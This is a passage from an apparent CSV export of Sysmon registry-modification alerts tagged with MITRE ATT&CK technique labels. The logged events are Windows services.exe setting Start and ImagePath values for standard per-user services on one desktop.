service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.768855200Z"",""eventRecordID"":""929"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.228",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.766950500Z"",""eventRecordID"":""928"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:14.215",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.766623300Z"",""eventRecordID"":""927"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_376ac\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_376ac\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_376ac\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 11:01:14.198",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.761614600Z"",""eventRecordID"":""926"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:14.178",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.760774700Z"",""eventRecordID"":""925"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.148",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.759126800Z"",""eventRecordID"":""924"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 11:01:14.125",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.758770900Z"",""eventRecordID"":""923"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.098",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.754016500Z"",""eventRecordID"":""922"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 11:01:14.061",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.753703400Z"",""eventRecordID"":""921"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.979",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.751959800Z"",""eventRecordID"":""920"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 11:01:13.954",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.751631700Z"",""eventRecordID"":""919"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.947",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.750473200Z"",""eventRecordID"":""918"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 11:01:13.921",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.750160000Z"",""eventRecordID"":""917"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.722",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.748722900Z"",""eventRecordID"":""916"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 11:01:13.448",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.747433700Z"",""eventRecordID"":""915"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.432",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.746245600Z"",""eventRecordID"":""914"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 